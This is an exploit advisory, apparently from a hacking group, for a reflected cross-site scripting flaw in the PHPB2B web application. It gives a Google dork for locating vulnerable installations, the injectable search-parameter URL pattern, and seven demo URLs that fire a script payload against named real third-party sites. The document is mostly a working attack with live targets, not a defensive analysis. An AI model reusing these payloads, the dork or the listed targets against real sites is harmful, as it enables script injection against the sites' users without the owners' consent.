############################################################################
# Exploit Title: PHPB2B Cross Site Scripting Vulnerabilitiy
# Google Dork: "Powered by PHPB2B"
# Date: 1/1/2012
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org  
# Software Link: www.phpb2b.com
# Version: All Version
# Category:: webapps
# Security Risk:: Low
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
############################################################################
#  Exploit:
# 
#  http://target.com/[patch]/list.php?do=search&q=[XSS]
#
#  
#  Demo:
#
#  www.tavsit.com/offer/list.php?do=search&q=<script>alert(/farbodmahini/)</script>
#  www.ipunesime.info/offer/list.php?do=search&q=<script>alert(/farbodmahini/)</script>
#  b2btradesingapore.com/b2bsg/offer/list.php?do=search&q=<script>alert(/farbodmahini/)</script>
#  www.b2b.is328.com/offer/list.php?do=search&q=<script>alert(/farbodmahini/)</script>
#  www.mall4trade.com/offer/list.php?do=search&q=<script>alert(/farbodmahini/)</script>
#  www.order.nuzoka.com/offer/list.php?do=search&q=<script>alert(/farbodmahini/)</script>
#  www.yahooway.com/offer/list.php?do=search&q=<script>alert(/farbodmahini/)</script>
#
############################################################################
# Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R- 
# IrIsT-K0242-P0W3RFU7-Mr.M4st3r ,...
############################################################################
GreetZ : All H4ckCity Member - BHG Members
############################################################################